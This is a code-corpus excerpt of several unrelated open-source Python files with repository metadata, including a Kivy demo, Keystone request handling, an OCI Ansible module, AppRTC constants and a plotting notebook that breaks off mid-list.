for title, sequence in SimpleFastaParser(handle):
entries.append((title, sequence))
handle.close()
return entries
# }}}
def _test():
"""Run the module's doctests (PRIVATE)."""
import os
import doctest
if os.path.isdir(os.path.join("..", "Tests")):
print("Running doctests...")
cur_dir = os.path.abspath(os.curdir)
os.chdir(os.path.join("..", "Tests"))
doctest.testmod()
os.chdir(cur_dir)
del cur_dir
print("Done")
elif os.path.isdir(os.path.join("Tests")):
print("Running doctests...")
cur_dir = os.path.abspath(os.curdir)
os.chdir(os.path.join("Tests"))
doctest.testmod()
os.chdir(cur_dir)
del cur_dir
print("Done")
if __name__ == "__main__":
_test()
| 31.681223
| 90
| 0.594693
|
4a143ff074b55a07a287b8c48f93e79774b7ef21
| 1,073
|
py
|
Python
|
screen.py
|
gugus1974/thermostat_v4
|
9666889e8589318bb85e6125a72f7556696628f3
|
[
"MIT"
] | 1
|
2018-06-11T16:56:00.000Z
|
2018-06-11T16:56:00.000Z
|
screen.py
|
gugus1974/thermostat_v4
|
9666889e8589318bb85e6125a72f7556696628f3
|
[
"MIT"
] | 7
|
2017-11-28T08:00:03.000Z
|
2018-02-05T06:03:47.000Z
|
screen.py
|
gugus1974/thermostat_v4
|
9666889e8589318bb85e6125a72f7556696628f3
|
[
"MIT"
] | 2
|
2017-11-29T08:52:46.000Z
|
2019-10-09T16:53:34.000Z
|
from kivy.app import App
from kivy.lang import Builder
from kivy.uix.screenmanager import ScreenManager, Screen
# Create both screens. Please note the root.manager.current: this is how
# you can control the ScreenManager from kv. Each screen has by default a
# property manager that gives you the instance of the ScreenManager used.
Builder.load_string("""
<MenuScreen>:
BoxLayout:
Button:
text: 'Goto settings'
on_press: root.manager.current = 'settings'
Button:
text: 'Quit'
<SettingsScreen>:
BoxLayout:
Button:
text: 'My settings button'
Button:
text: 'Back to menu'
on_press: root.manager.current = 'menu'
""")
# Declare both screens
class MenuScreen(Screen):
pass
class SettingsScreen(Screen):
pass
# Create the screen manager
sm = ScreenManager()
sm.add_widget(MenuScreen(name='menu'))
sm.add_widget(SettingsScreen(name='settings'))
class TestApp(App):
def build(self):
return sm
if __name__ == '__main__':
TestApp().run()
| 23.844444
| 73
| 0.666356
|
4a1441c9dda394596cc16c0f1bcdce463cb37e5a
| 2,332
|
py
|
Python
|
moonv4/moon_orchestrator/conf/plugins/authz.py
|
hashnfv/hashnfv-moon
|
daaba34fa2ed4426bc0fde359e54a5e1b872208c
|
[
"Apache-2.0"
] | null | null | null |
moonv4/moon_orchestrator/conf/plugins/authz.py
|
hashnfv/hashnfv-moon
|
daaba34fa2ed4426bc0fde359e54a5e1b872208c
|
[
"Apache-2.0"
] | null | null | null |
moonv4/moon_orchestrator/conf/plugins/authz.py
|
hashnfv/hashnfv-moon
|
daaba34fa2ed4426bc0fde359e54a5e1b872208c
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2015 Open Platform for NFV Project, Inc. and its contributors
# This software is distributed under the terms and conditions of the 'Apache-2.0'
# license which can be found in the file 'LICENSE' in this package distribution
# or at 'http://www.apache.org/licenses/LICENSE-2.0'.
import os
import time
import hashlib
from oslo_config import cfg
from oslo_log import log as logging
import oslo_messaging
from moon_orchestrator.dockers import DockerBase
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
DOMAIN = "moon_orchestrator"
__CWD__ = os.path.dirname(os.path.abspath(__file__))
# TODO (asteroide): select the right template folder
TEMPLATES_FOLDER = os.path.join(__CWD__, "..", "conf", "dockers")
# TODO (asteroide): add specific configuration options for that plugin
class AuthzFunction(DockerBase):
id = "moon_authz_function"
__build = """RUN mkdir -p /etc/moon/
COPY conf /etc/moon/
ADD dist/{py_pkg}.tar.gz /root
WORKDIR /root/{py_pkg}
RUN pip3 install -r requirements.txt
RUN pip3 install .
"""
def __init__(self, uuid, conf_file="", docker=None, network_config=None):
self.id = "authz_"+hashlib.sha224(uuid.encode("utf-8")).hexdigest()
super(AuthzFunction, self).__init__(
name="moon_authz",
run_cmd=["python3", "-m", "moon_authz", uuid],
conf_file=conf_file,
docker=docker,
network_config=network_config,
build_cmd=self.__build,
id=self.id,
tag=""
# tag=CONF.security_function.container
)
# note(asteroide): time to let the new docker boot
time.sleep(3)
# self.get_status()
def get_status(self):
return True
# transport = oslo_messaging.get_transport(CONF)
# target = oslo_messaging.Target(topic=self.id, version='1.0')
# client = oslo_messaging.RPCClient(transport, target)
# LOG.info("Calling Status on {}".format(self.id))
# ret = client.call({"component_id": self.id}, 'get_status', args=None)
# LOG.info(ret)
# return ret
def run(uuid, conf_file="", docker=None, network_config=None):
return AuthzFunction(uuid,
conf_file=conf_file,
docker=docker,
network_config=network_config)
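# Usage sketch (editor's illustration): the orchestrator calls run() with a
# PDP uuid; the container is named deterministically from that uuid as
#     "authz_" + hashlib.sha224(uuid.encode("utf-8")).hexdigest()
# e.g. run("pdp-uuid", conf_file="/etc/moon/moon.conf", docker=client,
#          network_config=net_cfg)   # client/net_cfg are caller-supplied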
| 34.294118
| 81
| 0.657804
|
4a144365c47d9def222fd8efbddd6756f3f179c4
| 2,510
|
py
|
Python
|
architectures/conll16st-hd-sdp/sup_parser_baseline_random.py
|
jimmycallin/master-thesis
|
5d30df288478ca944338eba353cbc2b84f415ee0
|
[
"MIT"
] | 2
|
2016-06-21T12:34:23.000Z
|
2017-05-23T18:34:53.000Z
|
architectures/conll16st-hd-sdp/sup_parser_baseline_random.py
|
jimmycallin/master-thesis
|
5d30df288478ca944338eba353cbc2b84f415ee0
|
[
"MIT"
] | null | null | null |
architectures/conll16st-hd-sdp/sup_parser_baseline_random.py
|
jimmycallin/master-thesis
|
5d30df288478ca944338eba353cbc2b84f415ee0
|
[
"MIT"
] | 1
|
2020-06-17T14:07:50.000Z
|
2020-06-17T14:07:50.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Sample Discourse Relation Classifier
ready for evaluation on TIRA evaluation system (supplementary evaluation)
The parser takes a language code ('en' or 'zh') followed by three arguments
$inputDataset = the folder of the dataset to parse.
The folder structure is the same as in the tar file
$inputDataset/parses.json
$inputDataset/relations-no-senses.json
$inputRun = the folder that contains the word2vec_model file or other resources
$outputDir = the folder that the parser will output 'output.json' to
Note that we have to fill in the 'Type' field as Explicit or Implicit,
but that will be overridden by the evaluator.
"""
import codecs
import json
import random
import sys
import validator
class DiscourseParser(object):
"""Sample discourse relation sense classifier
This simply classifies each instance randomly.
"""
def __init__(self):
pass
def classify_sense(self, data_dir, output_dir, valid_senses):
relation_file = '%s/relations-no-senses.json' % data_dir
parse_file = '%s/parses.json' % data_dir
parse = json.load(codecs.open(parse_file, encoding='utf8'))
relation_dicts = [json.loads(x) for x in open(relation_file)]
        output = codecs.open('%s/output.json' % output_dir, 'w', encoding='utf8')
random.seed(10)
for i, relation_dict in enumerate(relation_dicts):
sense = valid_senses[random.randint(0, len(valid_senses)-1)]
relation_dict['Sense'] = [sense]
relation_dict['Arg1']['TokenList'] = \
[x[2] for x in relation_dict['Arg1']['TokenList']]
relation_dict['Arg2']['TokenList'] = \
[x[2] for x in relation_dict['Arg2']['TokenList']]
relation_dict['Connective']['TokenList'] = \
[x[2] for x in relation_dict['Connective']['TokenList']]
if len(relation_dict['Connective']['TokenList']) > 0:
relation_dict['Type'] = 'Explicit'
else:
relation_dict['Type'] = 'Implicit'
output.write(json.dumps(relation_dict) + '\n')
if __name__ == '__main__':
language = sys.argv[1]
input_dataset = sys.argv[2]
input_run = sys.argv[3]
output_dir = sys.argv[4]
    if language == 'en':
        valid_senses = validator.EN_SENSES
    elif language == 'zh':
        valid_senses = validator.ZH_SENSES
    else:
        raise ValueError('Unsupported language: %s' % language)
parser = DiscourseParser()
parser.classify_sense(input_dataset, output_dir, valid_senses)
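# Example invocation (editor's note; paths are placeholders following the TIRA
# convention described in the module docstring):
#     python sup_parser_baseline_random.py en $inputDataset $inputRun $outputDir
# It reads $inputDataset/relations-no-senses.json and writes $outputDir/output.json
# with one randomly drawn valid sense per relation.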
| 34.383562
| 83
| 0.65259
|
4a14439cdf2813be11801d9dcc0b2b7c66c31466
| 26
|
py
|
Python
|
bin/dynatrace/dcrum/__init__.py
|
Dynatrace/DCRUM-Splunk-Application
|
ae6f5f766750bfc56d2c31d75256320341b50f35
|
[
"BSD-3-Clause"
] | 2
|
2016-06-20T02:02:34.000Z
|
2021-12-15T12:07:51.000Z
|
bin/dynatrace/dcrum/__init__.py
|
Dynatrace/DCRUM-Splunk-Application
|
ae6f5f766750bfc56d2c31d75256320341b50f35
|
[
"BSD-3-Clause"
] | null | null | null |
bin/dynatrace/dcrum/__init__.py
|
Dynatrace/DCRUM-Splunk-Application
|
ae6f5f766750bfc56d2c31d75256320341b50f35
|
[
"BSD-3-Clause"
] | 2
|
2020-01-20T04:36:55.000Z
|
2021-03-24T08:00:11.000Z
|
__author__ = 'cwpl-khoja'
| 13
| 25
| 0.730769
|
4a14440b8a32ae6d5f4530fbb5a381af22b54f89
| 308
|
py
|
Python
|
Algorithms/Sorting/The_Full_Counting_Sort.py
|
gauthamkrishna-g/HackerRank
|
472d7a56fc1c1c4f8f03fcabc09d08da4000efde
|
[
"MIT"
] | 1
|
2017-12-02T14:23:44.000Z
|
2017-12-02T14:23:44.000Z
|
Algorithms/Sorting/The_Full_Counting_Sort.py
|
gauthamkrishna-g/HackerRank
|
472d7a56fc1c1c4f8f03fcabc09d08da4000efde
|
[
"MIT"
] | null | null | null |
Algorithms/Sorting/The_Full_Counting_Sort.py
|
gauthamkrishna-g/HackerRank
|
472d7a56fc1c1c4f8f03fcabc09d08da4000efde
|
[
"MIT"
] | null | null | null |
n = int(input())
# one bucket per possible key (0..99); appends preserve input order,
# which is what makes this counting sort stable
ar = [[] for _ in range(100)]
for i in range(n):
    integer, string = input().strip().split(' ')
    integer = int(integer)
    if i < n//2:
        # per the problem statement, the first half of the strings are dashed out
        string = '-'
    ar[integer].append(string)
print(' '.join([string for equal_string in ar for string in equal_string]))
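# Worked example (editor's note): for the input
#     4
#     0 ab
#     6 cd
#     0 ef
#     6 gh
# the first n//2 strings are dashed out and buckets keep insertion order
# (stability), so the program prints: - ef - gh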
| 30.8
| 76
| 0.577922
|
4a14441e2a7288c740482b5aab6584b0548187c3
| 1,317
|
py
|
Python
|
gwidgets.py
|
AstroPix/ATLASPix
|
752fb5d6287efea7a7a2fc72e2925c8c940b4665
|
[
"MIT"
] | null | null | null |
gwidgets.py
|
AstroPix/ATLASPix
|
752fb5d6287efea7a7a2fc72e2925c8c940b4665
|
[
"MIT"
] | null | null | null |
gwidgets.py
|
AstroPix/ATLASPix
|
752fb5d6287efea7a7a2fc72e2925c8c940b4665
|
[
"MIT"
] | 1
|
2020-03-19T17:17:35.000Z
|
2020-03-19T17:17:35.000Z
|
import traitlets
from ipywidgets import widgets
from IPython.display import display
from tkinter import Tk, filedialog
class SelectFilesButton(widgets.Button):
"""A file widget that leverages tkinter.filedialog."""
def __init__(self):
super(SelectFilesButton, self).__init__()
# Add the selected_files trait
self.add_traits(files=traitlets.traitlets.List())
# Create the button.
self.description = "Select Files"
self.icon = "square-o"
self.style.button_color = "gray"
# Set on click behavior.
self.on_click(self.select_files)
@staticmethod
def select_files(b):
"""Generate instance of tkinter.filedialog.
Parameters
----------
b : obj:
An instance of ipywidgets.widgets.Button
"""
# Create Tk root
root = Tk()
# Hide the main window
root.withdraw()
# Raise the root to the top of all windows.
root.call('wm', 'attributes', '.', '-topmost', True)
        # The list of selected files is stored on b.files
b.files = filedialog.askopenfilename(multiple=True)
b.description = "Files Selected"
b.icon = "check-square-o"
b.style.button_color = "lightgreen"
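# Usage sketch (editor's illustration; assumes a Jupyter notebook session):
# my_button = SelectFilesButton()
# display(my_button)    # renders the button; clicking opens the native dialog
# my_button.files       # afterwards: the tuple of selected file paths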
| 31.357143
| 61
| 0.600607
|
4a14473e48dd7d21d740c225a8aa0a349b22cd85
| 4,719
|
py
|
Python
|
keystone/common/request.py
|
Afkupuz/4jaewoo
|
fc69258feac7858f5af99d2feab39c86ceb70203
|
[
"Apache-2.0"
] | 1
|
2019-05-08T06:09:35.000Z
|
2019-05-08T06:09:35.000Z
|
keystone/common/request.py
|
Afkupuz/4jaewoo
|
fc69258feac7858f5af99d2feab39c86ceb70203
|
[
"Apache-2.0"
] | 4
|
2018-08-22T14:51:02.000Z
|
2018-10-17T14:04:26.000Z
|
keystone/common/request.py
|
Afkupuz/4jaewoo
|
fc69258feac7858f5af99d2feab39c86ceb70203
|
[
"Apache-2.0"
] | 5
|
2018-08-03T17:19:34.000Z
|
2019-01-11T15:54:42.000Z
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from pycadf import cadftaxonomy as taxonomy
from pycadf import host
from pycadf import resource
import webob
from webob.descriptors import environ_getter
from keystone.common import authorization
from keystone.common import context
from keystone.common import utils
import keystone.conf
from keystone import exception
from keystone.i18n import _
# Environment variable used to pass the request context
CONTEXT_ENV = 'openstack.context'
CONF = keystone.conf.CONF
LOG = logging.getLogger(__name__)
class Request(webob.Request):
_context_dict = None
def _get_context_dict(self):
# allow middleware up the stack to provide context, params and headers.
context = self.environ.get(CONTEXT_ENV, {})
# NOTE(jamielennox): The webob package throws UnicodeError when a
# param cannot be decoded. If we make webob iterate them now we can
# catch this and throw an error early rather than on access.
try:
self.params.items()
except UnicodeDecodeError:
msg = _('Query string is not UTF-8 encoded')
raise exception.ValidationError(msg)
context['path'] = self.environ['PATH_INFO']
scheme = self.environ.get(CONF.secure_proxy_ssl_header)
if scheme:
# NOTE(andrey-mp): "wsgi.url_scheme" contains the protocol used
# before the proxy removed it ('https' usually). So if
# the webob.Request instance is modified in order to use this
# scheme instead of the one defined by API, the call to
# webob.Request.relative_url() will return a URL with the correct
# scheme.
self.environ['wsgi.url_scheme'] = scheme
context['host_url'] = self.host_url
# authentication and authorization attributes are set as environment
# values by the container and processed by the pipeline. The complete
# set is not yet known.
context['environment'] = self.environ
if self.context:
context['is_admin_project'] = self.context.is_admin_project
context.setdefault('is_admin', False)
return context
@property
def context_dict(self):
if not self._context_dict:
self._context_dict = self._get_context_dict()
return self._context_dict
@property
def auth_context(self):
return self.environ.get(authorization.AUTH_CONTEXT_ENV, {})
def assert_authenticated(self):
"""Ensure that the current request has been authenticated."""
if not self.context:
msg = _('An authenticated call was made and there is '
'no request.context. This means the '
'auth_context middleware is not in place. You '
'must have this middleware in your pipeline '
'to perform authenticated calls')
LOG.warning(msg)
raise exception.Unauthorized(msg)
if not self.context.authenticated:
# auth_context didn't decode anything we can use
raise exception.Unauthorized(
_('auth_context did not decode anything useful'))
@property
def audit_initiator(self):
"""A pyCADF initiator describing the current authenticated context."""
pycadf_host = host.Host(address=self.remote_addr,
agent=self.user_agent)
initiator = resource.Resource(typeURI=taxonomy.ACCOUNT_USER,
host=pycadf_host)
if self.context.user_id:
initiator.id = utils.resource_uuid(self.context.user_id)
initiator.user_id = self.context.user_id
if self.context.project_id:
initiator.project_id = self.context.project_id
if self.context.domain_id:
initiator.domain_id = self.context.domain_id
return initiator
auth_type = environ_getter('AUTH_TYPE', None)
remote_domain = environ_getter('REMOTE_DOMAIN', None)
context = environ_getter(context.REQUEST_CONTEXT_ENV, None)
token_auth = environ_getter('keystone.token_auth', None)
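# Usage sketch (editor's illustration, names are hypothetical): a controller
# can rely on the auth_context middleware having populated request.context.
# def get_resource(self, request):
#     request.assert_authenticated()       # raises Unauthorized otherwise
#     initiator = request.audit_initiator  # pyCADF resource for audit events
#     return lookup(request.context.user_id)   # lookup() is hypothetical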
| 37.452381
| 79
| 0.671752
|
4a14474e0829e739db1d640f8b83d3e5e5b5d631
| 2,853
|
py
|
Python
|
phi/tf/tf_cuda_resample.py
|
Neroware/PhiFlow
|
f85d1f46847d27332559e3d2b7ef6ac5d37796eb
|
[
"MIT"
] | null | null | null |
phi/tf/tf_cuda_resample.py
|
Neroware/PhiFlow
|
f85d1f46847d27332559e3d2b7ef6ac5d37796eb
|
[
"MIT"
] | null | null | null |
phi/tf/tf_cuda_resample.py
|
Neroware/PhiFlow
|
f85d1f46847d27332559e3d2b7ef6ac5d37796eb
|
[
"MIT"
] | null | null | null |
import os
import numpy as np
import tensorflow as tf
from tensorflow.python.framework import ops
from phi.struct.tensorop import collapsed_gather_nd
# Load Custom Ops
librariesLoaded = False
try:
current_dir = os.path.dirname(os.path.realpath(__file__))
resample_op_path = os.path.join(current_dir, 'cuda/build/resample.so')
resample_gradient_op_path = os.path.join(current_dir, 'cuda/build/resample_gradient.so')
assert os.path.isfile(
resample_op_path), 'CUDA binaries not found at %s. Run "python setup.py cuda" to compile them' % resample_op_path
assert os.path.isfile(resample_gradient_op_path), 'CUDA binaries not found at %s. Run "python setup.py cuda" to ' \
'compile them' % resample_gradient_op_path
resample_op = tf.load_op_library(resample_op_path)
resample_gradient_op = tf.load_op_library(resample_gradient_op_path)
librariesLoaded = True
except (RuntimeError, AssertionError) as e:
print('Could not load resample cuda libraries:', e)
librariesLoaded = False
# Register gradient
@ops.RegisterGradient("Resample")
def _resample_gradient(op, gradient):
gradients = resample_gradient_op.resample_gradient(gradient, op.inputs[0], op.inputs[1], op.inputs[2])
return [gradients[0], gradients[1], None]
def use_cuda(inputs):
if not librariesLoaded:
return False
if not tf.test.is_gpu_available(True, (3, 0)):
return False
shape = inputs.shape
dims = len(shape) - 2
components = shape[len(shape) - 1]
if dims > 3 or components > 4:
return False
if dims == 1 and shape[1] > 8192:
return False
if dims == 2 and (shape[1] > 32768 or shape[2] > 65536):
return False
if dims == 3 and (shape[1] > 2048 or shape[2] > 2048 or shape[3] > 2048):
return False
return True
def resample_cuda(inputs, sample_coords, boundary):
ZERO = 0
REPLICATE = 1
CIRCULAR = 2
SYMMETRIC = 3
REFLECT = 4
shape = inputs.shape
dims = len(shape) - 2
boundary_array = np.zeros((dims, 2), np.uint32)
for i in range(dims):
for j in range(2):
current_boundary = collapsed_gather_nd(boundary, [i, j]).lower()
if current_boundary == 'zero' or current_boundary == 'constant':
boundary_array[i, j] = ZERO
elif current_boundary == 'replicate':
boundary_array[i, j] = REPLICATE
elif current_boundary == 'circular' or current_boundary == 'wrap':
boundary_array[i, j] = CIRCULAR
elif current_boundary == 'symmetric':
boundary_array[i, j] = SYMMETRIC
elif current_boundary == 'reflect':
boundary_array[i, j] = REFLECT
return resample_op.resample(inputs, sample_coords, boundary_array)
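# Usage sketch (editor's illustration): guard the custom CUDA kernel with
# use_cuda() and fall back to a pure-TF path when it cannot be used.
# def resample(inputs, sample_coords, boundary='replicate'):
#     if use_cuda(inputs):
#         return resample_cuda(inputs, sample_coords, boundary)
#     return tf_resample_fallback(inputs, sample_coords, boundary)  # hypothetical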
| 37.539474
| 121
| 0.656502
|
4a14477830d7900c2a4dd6acfc6d0fb1cad13cf0
| 4,459
|
py
|
Python
|
plugins/modules/oci_network_cross_connect_location_facts.py
|
sohwaje/oci-ansible-collection
|
9e6b8cf55e596a96560710a457a7df05886fc59c
|
[
"Apache-2.0"
] | null | null | null |
plugins/modules/oci_network_cross_connect_location_facts.py
|
sohwaje/oci-ansible-collection
|
9e6b8cf55e596a96560710a457a7df05886fc59c
|
[
"Apache-2.0"
] | null | null | null |
plugins/modules/oci_network_cross_connect_location_facts.py
|
sohwaje/oci-ansible-collection
|
9e6b8cf55e596a96560710a457a7df05886fc59c
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# Copyright (c) 2020, 2021 Oracle and/or its affiliates.
# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Apache License v2.0
# See LICENSE.TXT for details.
# GENERATED FILE - DO NOT EDIT - MANUAL CHANGES WILL BE OVERWRITTEN
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = """
---
module: oci_network_cross_connect_location_facts
short_description: Fetches details about one or multiple CrossConnectLocation resources in Oracle Cloud Infrastructure
description:
- Fetches details about one or multiple CrossConnectLocation resources in Oracle Cloud Infrastructure
- Lists the available FastConnect locations for cross-connect installation. You need
this information so you can specify your desired location when you create a cross-connect.
version_added: "2.9.0"
author: Oracle (@oracle)
options:
compartment_id:
description:
- The L(OCID,https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment.
type: str
required: true
extends_documentation_fragment: [ oracle.oci.oracle, oracle.oci.oracle_name_option ]
"""
EXAMPLES = """
- name: List cross_connect_locations
oci_network_cross_connect_location_facts:
compartment_id: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
"""
RETURN = """
cross_connect_locations:
description:
- List of CrossConnectLocation resources
returned: on success
type: complex
contains:
description:
description:
- A description of the location.
returned: on success
type: str
sample: description_example
name:
description:
- The name of the location.
- "Example: `CyrusOne, Chandler, AZ`"
returned: on success
type: str
sample: CyrusOne, Chandler, AZ
sample: [{
"description": "description_example",
"name": "CyrusOne, Chandler, AZ"
}]
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.oracle.oci.plugins.module_utils import oci_common_utils
from ansible_collections.oracle.oci.plugins.module_utils.oci_resource_utils import (
OCIResourceFactsHelperBase,
get_custom_class,
)
try:
from oci.core import VirtualNetworkClient
HAS_OCI_PY_SDK = True
except ImportError:
HAS_OCI_PY_SDK = False
class CrossConnectLocationFactsHelperGen(OCIResourceFactsHelperBase):
"""Supported operations: list"""
def get_required_params_for_list(self):
return [
"compartment_id",
]
def list_resources(self):
optional_list_method_params = [
"name",
]
optional_kwargs = dict(
(param, self.module.params[param])
for param in optional_list_method_params
if self.module.params.get(param) is not None
)
return oci_common_utils.list_all_resources(
self.client.list_cross_connect_locations,
compartment_id=self.module.params.get("compartment_id"),
**optional_kwargs
)
CrossConnectLocationFactsHelperCustom = get_custom_class(
"CrossConnectLocationFactsHelperCustom"
)
class ResourceFactsHelper(
CrossConnectLocationFactsHelperCustom, CrossConnectLocationFactsHelperGen
):
pass
def main():
module_args = oci_common_utils.get_common_arg_spec()
module_args.update(
dict(compartment_id=dict(type="str", required=True), name=dict(type="str"),)
)
module = AnsibleModule(argument_spec=module_args)
if not HAS_OCI_PY_SDK:
module.fail_json(msg="oci python sdk required for this module.")
resource_facts_helper = ResourceFactsHelper(
module=module,
resource_type="cross_connect_location",
service_client_class=VirtualNetworkClient,
namespace="core",
)
result = []
if resource_facts_helper.is_list():
result = resource_facts_helper.list()
else:
resource_facts_helper.fail()
module.exit_json(cross_connect_locations=result)
if __name__ == "__main__":
main()
| 29.335526
| 121
| 0.696793
|
4a144974f789cf77e53b14078ede814e10141f49
| 2,999
|
py
|
Python
|
src/app_engine/constants.py
|
CoffeyMiao/apprtc
|
db4b915eed03423f7298d2944c1da66c9da401e3
|
[
"BSD-3-Clause"
] | null | null | null |
src/app_engine/constants.py
|
CoffeyMiao/apprtc
|
db4b915eed03423f7298d2944c1da66c9da401e3
|
[
"BSD-3-Clause"
] | null | null | null |
src/app_engine/constants.py
|
CoffeyMiao/apprtc
|
db4b915eed03423f7298d2944c1da66c9da401e3
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright 2015 Google Inc. All Rights Reserved.
"""AppRTC Constants.
This module contains the constants used in AppRTC Python modules.
"""
import os
# Deprecated domains which we should to redirect to REDIRECT_URL.
REDIRECT_DOMAINS = [
'apprtc.appspot.com', 'apprtc.webrtc.org', 'www.appr.tc'
]
# URL which we should redirect to if matching in REDIRECT_DOMAINS.
REDIRECT_URL = 'https://appr.tc'
ROOM_MEMCACHE_EXPIRATION_SEC = 60 * 60 * 24
MEMCACHE_RETRY_LIMIT = 100
LOOPBACK_CLIENT_ID = 'LOOPBACK_CLIENT_ID'
# Turn/Stun server override. This allows AppRTC to connect to turn servers
# directly rather than retrieving them from an ICE server provider.
ICE_SERVER_OVERRIDE = None
# Enable by uncommenting the block below and commenting out the line above, then specify your TURN and STUN servers.
# ICE_SERVER_OVERRIDE = [
# {
# "urls": [
# "turn:hostname/IpToTurnServer:19305?transport=udp",
# "turn:hostname/IpToTurnServer:19305?transport=tcp"
# ],
# "username": "TurnServerUsername",
# "credential": "TurnServerCredentials"
# },
# {
# "urls": [
# "stun:hostname/IpToStunServer:19302"
# ]
# }
# ]
# ICE_SERVER_BASE_URL = 'https://appr.tc'
# ICE_SERVER_URL_TEMPLATE = '%s/v1alpha/iceconfig?key=%s'
# ICE_SERVER_API_KEY = os.environ.get('ICE_SERVER_API_KEY')
ICE_SERVER_BASE_URL = ''
ICE_SERVER_URL_TEMPLATE = ''
ICE_SERVER_API_KEY = ''
HEADER_MESSAGE = os.environ.get('HEADER_MESSAGE')
ICE_SERVER_URLS = [url for url in os.environ.get('ICE_SERVER_URLS', '').split(',') if url]
# Dictionary keys in the collider instance info constant.
WSS_INSTANCE_HOST_KEY = 'host_port_pair'
WSS_INSTANCE_NAME_KEY = 'vm_name'
WSS_INSTANCE_ZONE_KEY = 'zone'
WSS_INSTANCES = [{
WSS_INSTANCE_HOST_KEY: '10.86.98.32:443',
# WSS_INSTANCE_HOST_KEY: 'apprtc-ws.webrtc.org:443',
WSS_INSTANCE_NAME_KEY: 'wsserver-std',
WSS_INSTANCE_ZONE_KEY: 'us-central1-a'
}, {
WSS_INSTANCE_HOST_KEY: '10.86.98.32:443',
# WSS_INSTANCE_HOST_KEY: 'apprtc-ws-2.webrtc.org:443',
WSS_INSTANCE_NAME_KEY: 'wsserver-std-2',
WSS_INSTANCE_ZONE_KEY: 'us-central1-f'
}]
WSS_HOST_PORT_PAIRS = [ins[WSS_INSTANCE_HOST_KEY] for ins in WSS_INSTANCES]
# memcache key for the active collider host.
WSS_HOST_ACTIVE_HOST_KEY = 'wss_host_active_host'
# Dictionary keys in the collider probing result.
WSS_HOST_IS_UP_KEY = 'is_up'
WSS_HOST_STATUS_CODE_KEY = 'status_code'
WSS_HOST_ERROR_MESSAGE_KEY = 'error_message'
RESPONSE_ERROR = 'ERROR'
RESPONSE_ROOM_FULL = 'FULL'
RESPONSE_UNKNOWN_ROOM = 'UNKNOWN_ROOM'
RESPONSE_UNKNOWN_CLIENT = 'UNKNOWN_CLIENT'
RESPONSE_DUPLICATE_CLIENT = 'DUPLICATE_CLIENT'
RESPONSE_SUCCESS = 'SUCCESS'
RESPONSE_INVALID_REQUEST = 'INVALID_REQUEST'
IS_DEV_SERVER = os.environ.get('APPLICATION_ID', '').startswith('dev')
BIGQUERY_URL = 'https://www.googleapis.com/auth/bigquery'
# Dataset used in production.
BIGQUERY_DATASET_PROD = 'prod'
# Dataset used when running locally.
BIGQUERY_DATASET_LOCAL = 'dev'
# BigQuery table within the dataset.
BIGQUERY_TABLE = 'analytics'
| 31.239583
| 90
| 0.750917
|
4a1449b16aa858fe4b581022fca1a001558a6e45
| 14,389
|
py
|
Python
|
archive/scripts/analysis_0_single_run/nbconverted/4_create_figs.py
|
ajlee21/Batch_effects_simulation
|
d707321346de48de5e63cf251280bdf9372be59c
|
[
"BSD-3-Clause"
] | 6
|
2020-05-04T15:16:32.000Z
|
2021-02-28T04:49:21.000Z
|
archive/scripts/analysis_0_single_run/nbconverted/4_create_figs.py
|
ajlee21/Batch_effects_simulation
|
d707321346de48de5e63cf251280bdf9372be59c
|
[
"BSD-3-Clause"
] | 12
|
2020-02-27T20:12:36.000Z
|
2021-04-07T20:28:35.000Z
|
archive/scripts/analysis_0_single_run/nbconverted/4_create_figs.py
|
ajlee21/Batch_effects_simulation
|
d707321346de48de5e63cf251280bdf9372be59c
|
[
"BSD-3-Clause"
] | 2
|
2019-06-02T18:29:17.000Z
|
2020-02-13T09:33:37.000Z
|
# coding: utf-8
# In[1]:
get_ipython().run_line_magic('load_ext', 'autoreload')
get_ipython().run_line_magic('autoreload', '2')
import os
import sys
import glob
import pickle
import pandas as pd
import numpy as np
from plotnine import (ggplot,
labs,
geom_line,
geom_point,
geom_errorbar,
aes,
ggsave,
theme_bw,
theme,
scale_color_manual,
element_blank,
element_text,
element_rect,
element_line,
coords)
import warnings
warnings.filterwarnings(action='ignore')
from numpy.random import seed
randomState = 123
seed(randomState)
# In[2]:
# File directories
local_dir = "/home/alexandra/Documents/"
similarity_uncorrected_file = os.path.join(
local_dir,
"Data",
"Batch_effects",
"output",
"saved variables",
"analysis_0_similarity_uncorrected.pickle")
ci_uncorrected_file = os.path.join(
local_dir,
"Data",
"Batch_effects",
"output",
"saved variables",
"analysis_0_ci_uncorrected.pickle")
similarity_corrected_file = os.path.join(
local_dir,
"Data",
"Batch_effects",
"output",
"saved variables",
"analysis_0_similarity_corrected.pickle")
ci_corrected_file = os.path.join(
local_dir,
"Data",
"Batch_effects",
"output",
"saved variables",
"analysis_0_ci_corrected.pickle")
permuted_score_file = os.path.join(
local_dir,
"Data",
"Batch_effects",
"output",
"saved variables",
"analysis_0_permuted.txt.npy")
# In[3]:
# Output files
svcca_uncorrected_file = os.path.join(
local_dir,
"Data",
"Batch_effects",
"output",
"talk figures",
"analysis_0_svcca_uncorrected.png")
svcca_uncorrected_blk_file = os.path.join(
local_dir,
"Data",
"Batch_effects",
"output",
"talk figures",
"analysis_0_svcca_uncorrected_blk.png")
svcca_overlay_file = os.path.join(
local_dir,
"Data",
"Batch_effects",
"output",
"talk figures",
"analysis_0_svcca_overlay.png")
svcca_overlay_blk_file = os.path.join(
local_dir,
"Data",
"Batch_effects",
"output",
"talk figures",
